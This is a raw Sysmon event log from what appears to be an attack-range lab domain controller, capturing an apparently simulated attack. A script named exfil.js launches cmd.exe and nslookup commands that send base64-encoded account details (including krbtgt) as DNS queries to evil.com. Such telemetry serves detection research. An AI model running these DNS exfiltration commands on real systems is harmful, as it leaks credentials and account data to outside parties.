14:16:29.515{2E1864BB-17BD-629A-3840-000000005F02}79603308C:\Windows\system32\cmd.exe{2E1864BB-17BD-629A-3A40-000000005F02}7172C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.515{2E1864BB-17BD-629A-3A40-000000005F02}7172C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BD-629A-3840-000000005F02}7960C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlngid.tmp 2>&1 10341000x8000000000000000199870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.415{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3940-000000005F02}5696C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.415{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3940-000000005F02}5696C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.394{2E1864BB-17BD-629A-3940-000000005F02}56962568C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3840-000000005F02}7960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.377{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3940-000000005F02}5696C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.361{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3840-000000005F02}7960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.361{2E1864BB-17A1-629A-783D-000000005F02}55527480C:\Windows\System32\WScript.exe{2E1864BB-17BD-629A-3840-000000005F02}7960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.366{2E1864BB-17BD-629A-3840-000000005F02}7960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlngid.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.361{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmwv.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.329{2E1864BB-17BD-629A-3640-000000005F02}499632C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3740-000000005F02}5744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.313{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.313{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.313{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.313{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.313{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3740-000000005F02}5744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.313{2E1864BB-17BD-629A-3540-000000005F02}81088124C:\Windows\system32\cmd.exe{2E1864BB-17BD-629A-3740-000000005F02}5744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.320{2E1864BB-17BD-629A-3740-000000005F02}5744C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BD-629A-3540-000000005F02}8108C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcmwv.tmp 2>&1 10341000x8000000000000000199850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.291{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3640-000000005F02}4996C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.291{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3640-000000005F02}4996C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.272{00000000-0000-0000-0000-000000000000}3336<unknown process>-udpfalsefalse127.0.0.1-52614-false127.0.0.1-53domain 354300x8000000000000000199847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.271{00000000-0000-0000-0000-000000000000}3336<unknown process>-udptruefalse127.0.0.1-52614-false127.0.0.1-53domain 354300x8000000000000000199846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{00000000-0000-0000-0000-000000000000}6180<unknown process>-udpfalsefalse127.0.0.1-52613-false127.0.0.1-53domain 354300x8000000000000000199845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{00000000-0000-0000-0000-000000000000}6180<unknown process>-udptruefalse127.0.0.1-52613-false127.0.0.1-53domain 354300x8000000000000000199844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{00000000-0000-0000-0000-000000000000}6180<unknown process>-udpfalsefalse127.0.0.1-52612-false127.0.0.1-53domain 10341000x8000000000000000199843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.291{2E1864BB-17BD-629A-3640-000000005F02}499632C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3540-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{00000000-0000-0000-0000-000000000000}6180<unknown process>-udptruefalse127.0.0.1-52612-false127.0.0.1-53domain 354300x8000000000000000199841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{00000000-0000-0000-0000-000000000000}6180<unknown process>-udpfalsefalse127.0.0.1-52611-false127.0.0.1-53domain 354300x8000000000000000199840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.197{00000000-0000-0000-0000-000000000000}6180<unknown process>-udptruefalse127.0.0.1-52611-false127.0.0.1-53domain 354300x8000000000000000199839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{00000000-0000-0000-0000-000000000000}2872<unknown process>-udpfalsefalse127.0.0.1-52610-false127.0.0.1-53domain 354300x8000000000000000199838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{00000000-0000-0000-0000-000000000000}2872<unknown process>-udptruefalse127.0.0.1-52610-false127.0.0.1-53domain 354300x8000000000000000199837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{00000000-0000-0000-0000-000000000000}2872<unknown process>-udpfalsefalse127.0.0.1-52609-false127.0.0.1-53domain 354300x8000000000000000199836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.135{00000000-0000-0000-0000-000000000000}2872<unknown process>-udptruefalse127.0.0.1-52609-false127.0.0.1-53domain 354300x8000000000000000199835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.134{00000000-0000-0000-0000-000000000000}2872<unknown process>-udptruefalse127.0.0.1-52608-false127.0.0.1-53domain 354300x8000000000000000199834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{00000000-0000-0000-0000-000000000000}2620<unknown process>-udpfalsefalse127.0.0.1-52607-false127.0.0.1-53domain 354300x8000000000000000199833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{00000000-0000-0000-0000-000000000000}2620<unknown process>-udptruefalse127.0.0.1-52607-false127.0.0.1-53domain 354300x8000000000000000199832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.061{00000000-0000-0000-0000-000000000000}2620<unknown process>-udpfalsefalse127.0.0.1-52606-false127.0.0.1-53domain 10341000x8000000000000000199831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.276{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3640-000000005F02}4996C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.260{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.260{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 